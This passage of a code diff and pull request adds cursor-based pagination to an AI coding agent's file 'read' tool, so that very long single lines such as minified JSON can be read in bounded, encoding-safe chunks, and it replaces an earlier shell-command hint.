+      {} as never,
+    );
+
+    expect(textContent(selected)).toBe("second\nthird\n");
   });
 
   it("clamps non-positive line limits before slicing file content", async () => {
@@ -424,8 +548,12 @@ describe("read tool", () => {
     const tool = createReadToolDefinition("/workspace");
 
     expect(Value.Check(tool.parameters, { path: "notes.txt", offset: 1 })).toBe(true);
+    expect(Value.Check(tool.parameters, { path: "notes.txt", cursor: 0 })).toBe(true);
     for (const offset of [0, -1, 1.5]) {
       expect(Value.Check(tool.parameters, { path: "notes.txt", offset })).toBe(false);
+    }
+    for (const cursor of [-1, 1.5]) {
+      expect(Value.Check(tool.parameters, { path: "notes.txt", cursor })).toBe(false);
     }
   });
 

--- a/src/agents/sessions/tools/read.ts
+++ b/src/agents/sessions/tools/read.ts
@@ -19,6 +19,7 @@ import {
  */
 import { normalizeNativePathSeparators } from "../../../shared/ignore-rules.js";
 import { levenshteinDistance } from "../../../shared/levenshtein-distance.js";
+import { truncateUtf8Prefix } from "../../../utils/utf8-truncate.js";
 import { getReadmePath } from "../../config.js";
 import { keyHint, keyText } from "../../modes/interactive/components/keybinding-hints.js";
 import {
@@ -34,20 +35,21 @@ import type { ToolDefinition, ToolRenderResultOptions } from "../extensions/type
 import { normalizePositiveLimit } from "./limits.js";
 import { getReadPathVariants, resolveReadPath } from "./path-utils.js";
 import { getTextOutput, invalidArgText, replaceTabs, shortenPath, str } from "./render-utils.js";
-import type { ReadToolDetails, ReadToolTruncationDetails } from "./tool-contracts.js";
-import { wrapToolDefinition } from "./tool-definition-wrapper.js";
 import {
-  DEFAULT_MAX_BYTES,
-  DEFAULT_MAX_LINES,
-  formatSize,
-  truncateHead,
-  type TruncationResult,
-} from "./truncate.js";
+  ReadToolContinuationSchema,
+  type ReadToolContinuation,
+  type ReadToolDetails,
+} from "./tool-contracts.js";
+import { wrapToolDefinition } from "./tool-definition-wrapper.js";
+import { DEFAULT_MAX_BYTES, DEFAULT_MAX_LINES, formatSize, truncateHead } from "./truncate.js";
 
 const readSchema = Type.Object({
   path: Type.String({ description: "File path; relative/absolute." }),
   offset: Type.Optional(Type.Integer({ minimum: 1, description: "Start line; 1-based." })),
   limit: Type.Optional(Type.Number({ description: "Max lines." })),
+  cursor: Type.Optional(
+    Type.Integer({ minimum: 0, description: "Character position within the start line; 0-based." }),
+  ),
 });
 
 const ReadTruncationOutputSchema = Type.Object(
@@ -84,6 +86,7 @@ const ReadToolOutputSchema = Type.Union([
       kind: Type.Literal("truncated"),
       content: Type.String(),
       truncation: ReadTruncationOutputSchema,
+      continuation: ReadToolContinuationSchema,
     },
     { additionalProperties: false },
   ),
@@ -98,26 +101,17 @@ const ReadToolOutputSchema = Type.Union([
   ),
 ]);
 
-function withoutTruncationContent(truncation: TruncationResult): ReadToolTruncationDetails {
-  const { content: _content, ...details } = truncation;
-  return details;
-}
-
 function createReadDetails(
   content: (TextContent | ImageContent)[],
-  truncation?: TruncationResult,
+  truncated?: Extract<ReadToolDetails, { kind: "truncated" }>,
 ): ReadToolDetails {
   const text = content.find((part): part is TextContent => part.type === "text")?.text ?? "";
   const image = content.find((part): part is ImageContent => part.type === "image");
   if (image) {
     return { kind: "image", content: text, mimeType: image.mimeType };
   }
-  if (truncation) {
-    return {
-      kind: "truncated",
-      content: text,
-      truncation: withoutTruncationContent(truncation),
-    };
+  if (truncated) {
+    return { ...truncated, content: text };
   }
   return { kind: "text", content: text };
 }
@@ -218,9 +212,17 @@ export interface ReadToolOptions {
   autoResizeImages?: boolean;
   /** Custom operations for file reading. Default: local filesystem */
   operations?: ReadOperations;
+  /** Complete model-visible call budget; individual pages never exceed the session ceiling. */
+  maxBytes?: number;
 }
 
-type ReadRenderArgs = { path?: string; file_path?: string; offset?: number; limit?: number };
+type ReadRenderArgs = {
+  path?: string;
+  file_path?: string;
+  offset?: number;
+  limit?: number;
+  cursor?: number;
+};
 
 function formatReadLineRange(args: ReadRenderArgs | undefined, theme: Theme): string {
   if (args?.offset === undefined && args?.limit === undefined) {
@@ -255,10 +257,6 @@ function getNonVisionImageNote(model: Model | undefined): string | undefined {
     return undefined;
   }
   return "[Current model does not support images. The image will be omitted from this request.]";
-}
-
-function quotePosixShellArg(value: string): string {
-  return `'${value.replaceAll("'", "'\\''")}'`;
 }
 
 function getOpenClawDocsClassification(
@@ -432,23 +430,138 @@ function formatReadResult(
   return text;
 }
 
+type BoundedReadTextPage = Extract<ReadToolDetails, { kind: "text" | "truncated" }>;
+
+/** Format model-visible pagination guidance from its exact structured continuation. */
+export function formatReadContinuationNotice(
+  continuation: ReadToolContinuation,
+  maxBytes: number,
+  range?: { startLine: number; totalLines: number },
+): string {
+  const cursor = continuation.kind === "cursor" ? `, cursor=${continuation.cursor}` : "";
+  const limit = continuation.limit === undefined ? "" : `, limit=${continuation.limit}`;
+  if (!range) {
+    const budget = formatSize(maxBytes).replace(/\.0(?=KB)/, "");
+    return `\n\n[Read output capped at ${budget} for this call. Use offset=${continuation.offset}${cursor}${limit} to continue.]`;
+  }
+  const label =
+    continuation.kind === "cursor"
+      ? `part of line ${range.startLine}`
+      : `lines ${range.startLine}-${continuation.offset - 1} of ${range.totalLines}`;
+  const action = continuation.kind === "cursor" ? "Use read with" : "Use";
+  return `\n\n[Showing ${label} (${formatSize(maxBytes)} limit). ${action} offset=${continuation.offset}${cursor}${limit} to continue.]`;
+}
+
+/** Bound a selected text page once; legacy injected readers reuse this owner decision. */
+export function createBoundedReadTextPage(params: {
+  content: string;
+  startLine: number;
+  endLine: number;
+  totalLines: number;
+  cursor?: number;
+  limit?: number;
+  maxBytes: number;
+  pageMaxBytes?: number;
+  adaptive?: boolean;
+}): BoundedReadTextPage {
+  const maxBytes = params.pageMaxBytes ?? Math.min(DEFAULT_MAX_BYTES, params.maxBytes);
+  const remainingLines = params.totalLines - params.endLine;
+  const limitNotice =
+    params.limit !== undefined && remainingLines > 0
+      ? `\n\n[${remainingLines} more lines in file. Use offset=${params.endLine + 1} to continue.]`
+      : "";
+  const contentBytes = Buffer.byteLength(params.content, "utf8");
+  if (
+    params.endLine - params.startLine < DEFAULT_MAX_LINES &&
+    contentBytes + Buffer.byteLength(limitNotice, "utf8") <= maxBytes
+  ) {
+    return { kind: "text", content: `${params.content}${limitNotice}` };
+  }
+
+  const range = params.adaptive
+    ? undefined
+    : { startLine: params.startLine, totalLines: params.totalLines };
+  const boundedLimit = params.limit === undefined ? {} : { limit: params.limit };
+  const firstLine = params.content.split("\n", 1)[0] ?? "";
+  const cursorEstimate: ReadToolContinuation = {
+    kind: "cursor",
+    offset: params.startLine,
+    cursor: (params.cursor ?? 0) + firstLine.length,
+    ...boundedLimit,
+  };
+  const lineEstimate: ReadToolContinuation = {
+    kind: "line",
+    offset: params.totalLines + 1,
+    ...boundedLimit,
+  };
+  const reservedBytes = Math.max(
+    Buffer.byteLength(formatReadContinuationNotice(cursorEstimate, params.maxBytes, range), "utf8"),
+    Buffer.byteLength(formatReadContinuationNotice(lineEstimate, params.maxBytes, range), "utf8"),
+  );
+  const truncation = truncateHead(params.content, { maxBytes: maxBytes - reservedBytes });
+  if (!truncation.truncated) {
+    return { kind: "text", content: `${truncation.content}${limitNotice}` };
+  }
+
+  let continuation: ReadToolContinuation;
+  let content = truncation.content;
+  if (truncation.firstLineExceedsLimit) {
+    content = truncateUtf8Prefix(firstLine, maxBytes - reservedBytes);
+    continuation = {
+      kind: "cursor",
+      offset: params.startLine,
+      cursor: (params.cursor ?? 0) + content.length,
+      ...boundedLimit,
+    };
+  } else {
+    const nextOffset = params.startLine + truncation.outputLines;
+    continuation = {
+      kind: "line",
+      offset: nextOffset,
+      ...(params.limit === undefined
+        ? {}
+        : { limit: Math.max(1, params.endLine - nextOffset + 1) }),
+    };
+  }
+
+  const { content: _content, ...truncationDetails } = truncation;
+  return {
+    kind: "truncated",
+    content: `${content}${formatReadContinuationNotice(continuation, params.maxBytes, range)}`,
+    truncation: {
+      ...truncationDetails,
+      outputBytes: Buffer.byteLength(content, "utf8"),
+      firstLineExceedsLimit: false,
+      lastLinePartial: continuation.kind === "cursor",
+      totalLines: params.totalLines,
+    },
+    continuation,
+  };
+}
+
 export function createReadToolDefinition(
   cwd: string,
   options?: ReadToolOptions,
 ): ToolDefinition<typeof readSchema, ReadToolDetails> {
   const autoResizeImages = options?.autoResizeImages ?? true;
   const ops = options?.operations ?? defaultReadOperations;
+  const maxBytes = options?.maxBytes ?? DEFAULT_MAX_BYTES;
   return {
     name: "read",
     label: "read",
-    description: `Read text/image file (jpg/png/gif/webp/bmp); images attach to model context. Text caps ${DEFAULT_MAX_LINES} lines or ${DEFAULT_MAX_BYTES / 1024}KB. Large/full file: continue offset/limit.`,
+    description: `Read text/image file (jpg/png/gif/webp/bmp); images attach to model context. Text caps ${DEFAULT_MAX_LINES} lines or ${DEFAULT_MAX_BYTES / 1024}KB. Continue with offset/limit, or cursor within a long line.`,
     promptSnippet: "Read file contents",
-    promptGuidelines: ["Use read to examine files instead of cat or sed."],
+    promptGuidelines: ["Use read to examine files and its offset, limit, or cursor to continue."],
     parameters: readSchema,
     outputSchema: ReadToolOutputSchema,
     async execute(
       toolCallId,
-      { path, offset, limit }: { path: string; offset?: number; limit?: number },
+      {
+        path,
+        offset,
+        limit,
+        cursor,
+      }: { path: string; offset?: number; limit?: number; cursor?: number },
       signal?: AbortSignal,
       onUpdate?,
       ctx?,
@@ -457,6 +570,9 @@ export function createReadToolDefinition(
       void onUpdate;
       if (offset !== undefined && (!Number.isSafeInteger(offset) || offset < 1)) {
         throw new Error("Offset must be an integer at least 1");
+      }
+      if (cursor !== undefined && (!Number.isSafeInteger(cursor) || cursor < 0)) {
+        throw new Error("Cursor must be an integer at least 0");
       }
       return new Promise<{
         content: (TextContent | ImageContent)[];
@@ -482,7 +598,7 @@ export function createReadToolDefinition(
             const buffer = await ops.readFile(absolutePath);
             const mimeType = await detectReadImageMimeType(ops, buffer, absolutePath);
             let content: (TextContent | ImageContent)[];
-            let truncationDetails: TruncationResult | undefined;
+            let truncated: Parameters<typeof createReadDetails>[1];
             const nonVisionImageNote = getNonVisionImageNote(ctx?.model);
             if (mimeType) {
               const base64 = buffer.toString("base64");
@@ -528,7 +644,23 @@ export function createReadToolDefinition(
                     : `File contains no readable text (${buffer.length} bytes).`;
               } else if (startLine >= totalFileLines) {
                 outputText = `Offset ${offset} is beyond end of file (${totalFileLines} lines total). Retry with offset <= ${totalFileLines}.`;
+              } else if (cursor !== undefined && cursor >= allLines[startLine]!.length) {
+                const nextLine =
+                  startLine + 1 < totalFileLines
+                    ? ` Use offset=${startLineDisplay + 1} to continue.`
+                    : "";
+                outputText = `Cursor ${cursor} is at or beyond the end of line ${startLineDisplay} (${allLines[startLine]!.length} characters).${nextLine}`;
               } else {
+                const firstLine = allLines[startLine]!;
+                if (
+                  cursor !== undefined &&
+                  cursor > 0 &&
+                  firstLine.codePointAt(cursor - 1)! > 0xffff
+                ) {
+                  throw new Error(
+                    `Cursor ${cursor} splits a UTF-16 surrogate pair; retry with cursor=${cursor - 1} or cursor=${cursor + 1}.`,
+                  );
+                }
                 const endLine =
                   limit === undefined
                     ? totalFileLines
@@ -537,6 +669,9 @@ export function createReadToolDefinition(
                         totalFileLines,
                       );
                 const selectedLines = allLines.slice(startLine, endLine);
+                if (cursor !== undefined) {
+                  selectedLines[0] = firstLine.slice(cursor);
+                }
                 const userLimitedLines = limit === undefined ? undefined : endLine - startLine;
                 if (selectedLines.every((line) => line.length === 0)) {
                   const selectedLineCount = selectedLines.length;
@@ -552,33 +687,21 @@ export function createReadToolDefinition(
                   if (endLine === totalFileLines && textContent.endsWith("\n")) {
                     selectedContent += "\n";
                   }
-                  const truncation = truncateHead(selectedContent);
-                  if (truncation.firstLineExceedsLimit) {
-                    const lineBreak = selectedContent.indexOf("\n");
-                    const firstLine =
-                      lineBreak === -1 ? selectedContent : selectedContent.slice(0, lineBreak);
-                    const firstLineSize = formatSize(Buffer.byteLength(firstLine, "utf-8"));
-                    outputText = `[Line ${startLineDisplay} is ${firstLineSize}, exceeds ${formatSize(DEFAULT_MAX_BYTES)} limit. Use bash: sed -n '${startLineDisplay}p' ${quotePosixShellArg(path)} | head -c ${DEFAULT_MAX_BYTES}]`;
-                    truncationDetails = { ...truncation, totalLines: totalFileLines };
-                  } else if (truncation.truncated) {
-                    const endLineDisplay = startLineDisplay + truncation.outputLines - 1;
-                    const nextOffset = endLineDisplay + 1;
-                    outputText = truncation.content;
-                    if (truncation.truncatedBy === "lines") {
-                      outputText += `\n\n[Showing lines ${startLineDisplay}-${endLineDisplay} of ${totalFileLines}. Use offset=${nextOffset} to continue.]`;
-                    } else {
-                      outputText += `\n\n[Showing lines ${startLineDisplay}-${endLineDisplay} of ${totalFileLines} (${formatSize(DEFAULT_MAX_BYTES)} limit). Use offset=${nextOffset} to continue.]`;
-                    }
-                    truncationDetails = { ...truncation, totalLines: totalFileLines };
-                  } else if (
-                    userLimitedLines !== undefined &&
-                    startLine + userLimitedLines < totalFileLines
-                  ) {
-                    const remaining = totalFileLines - (startLine + userLimitedLines);
-                    const nextOffset = startLine + userLimitedLines + 1;
-                    outputText = `${truncation.content}\n\n[${remaining} more lines in file. Use offset=${nextOffset} to continue.]`;
-                  } else {
-                    outputText = truncation.content;
+                  const noteBytes = note ? Buffer.byteLength(`${note}\n`, "utf8") : 0;
+                  const page = createBoundedReadTextPage({
+                    content: selectedContent,
+                    startLine: startLineDisplay,
+                    endLine,
+                    totalLines: totalFileLines,
+                    cursor,
+                    limit: userLimitedLines,
+                    maxBytes,
+                    pageMaxBytes: Math.min(DEFAULT_MAX_BYTES, maxBytes) - noteBytes,
+                    adaptive: options?.maxBytes !== undefined,
+                  });
+                  outputText = page.content;
+                  if (page.kind === "truncated") {
+                    truncated = page;
                   }
                 }
               }
@@ -596,7 +719,7 @@ export function createReadToolDefinition(
               return;
             }
             signal?.removeEventListener("abort", onAbort);
-            resolve({ content, details: createReadDetails(content, truncationDetails) });
+            resolve({ content, details: createReadDetails(content, truncated) });
           } catch (error: unknown) {
             signal?.removeEventListener("abort", onAbort);
             if (!aborted) {

--- a/src/agents/sessions/tools/tool-contracts.ts
+++ b/src/agents/sessions/tools/tool-contracts.ts
@@ -3,6 +3,7 @@
  *
  * Keeps tool factories, renderers, and callers aligned on typed payload and metadata shapes.
  */
+import { Type, type Static } from "typebox";
 import type { Edit } from "./edit-diff.js";
 import type { TruncationResult } from "./truncate.js";
 
@@ -80,9 +81,32 @@ export interface ReadToolInput {
   path: string;
   offset?: number;
   limit?: number;
+  cursor?: number;
 }
 
 export type ReadToolTruncationDetails = Omit<TruncationResult, "content">;
+
+const readContinuationFields = {
+  offset: Type.Integer({ minimum: 1, maximum: Number.MAX_SAFE_INTEGER }),
+  limit: Type.Optional(Type.Integer({ minimum: 1, maximum: Number.MAX_SAFE_INTEGER })),
+};
+
+export const ReadToolContinuationSchema = Type.Union([
+  Type.Object(
+    { kind: Type.Literal("line"), ...readContinuationFields },
+    { additionalProperties: false },
+  ),
+  Type.Object(
+    {
+      kind: Type.Literal("cursor"),
+      ...readContinuationFields,
+      cursor: Type.Integer({ minimum: 0, maximum: Number.MAX_SAFE_INTEGER }),
+    },
+    { additionalProperties: false },
+  ),
+]);
+
+export type ReadToolContinuation = Static<typeof ReadToolContinuationSchema>;
 
 export type ReadToolDetails =
   | { kind: "text"; content: string }
@@ -91,6 +115,7 @@ export type ReadToolDetails =
       kind: "truncated";
       content: string;
       truncation: ReadToolTruncationDetails;
+      continuation: ReadToolContinuation;
     }
   | {
       kind: "not_found";


### PR DESCRIPTION
## What Problem This Solves

Fixes an issue where users reading minified JSON, generated data, or other files containing a single line larger than 50 KiB received none of that line. The read result instead recommended a Bash pipeline, which dead-ended agents whose tool surface intentionally omitted exec/process.

## Why This Change Was Made

The canonical read owner now returns a bounded UTF-8/UTF-16-safe slice plus a flat intra-line `cursor`, while existing `offset`/`limit` line paging remains unchanged. OpenClaw's adaptive wrapper chooses the context-derived byte budget and aggregates canonical pages without exceeding the complete model-visible cap, including continuation guidance.

Known skill instruction paths remain whole-document-only: window parameters are rejected, fitting instructions are delivered in full, and oversized instructions return a bounded refusal without leaking a misleading partial document. The Codex app-server filesystem contract was inspected directly and remains path-only/full-byte; model-visible slicing stays owned by OpenClaw.

Production growth is +408/-133 (net +275). The remaining growth is the explicit cursor contract, bounded-page owner, adaptive continuation metadata, and whole-instruction policy; the obsolete shell fallback was removed. Tests are +315/-44 (net +271).

## User Impact

Agents can now inspect large single-line files through `read` alone, including on exec-disabled surfaces. Repeated cursor reads reconstruct the original content exactly without splitting multibyte UTF-8 characters or UTF-16 surrogate pairs, and every result remains within its hard context budget.

Skill and playbook-style instruction documents are never presented as a partial first window that could be mistaken for the complete guidance.

## Evidence

Before the fix, a 51,470-byte one-line JSON file returned only:

```text
[Line 1 is 50.3KB, exceeds 50.0KB limit. Use bash: sed ... | head -c 51200]
```

with zero output lines and no usable read continuation.

After the fix:

- `node scripts/run-vitest.mjs src/agents/sessions/tools/read.test.ts src/agents/agent-tools.create-openclaw-coding-tools.test.ts src/agents/filesystem-tools-output-contract.test.ts` — 169 tests passed.
- `node scripts/check-changed.mjs -- <8 changed files>` — formatting, core/test types, lint, dead exports, import cycles, database/storage, plugin-boundary, and repository guards passed.
- `pnpm build` — full build passed; no ineffective dynamic import warning.
- Direct assembled-tool proof with `exec` and `process` absent reconstructed an 81,936-byte minified JSON file in 3 bounded reads and a 98,316-byte emoji line in 4 bounded reads. Each result was at most 32 KiB and contained no Bash/sed/head guidance.
- Structured autoreview: clean, no accepted/actionable findings.

AI-assisted: yes. I reviewed the implementation, ownership boundary, tests, dependency contract, and proof results.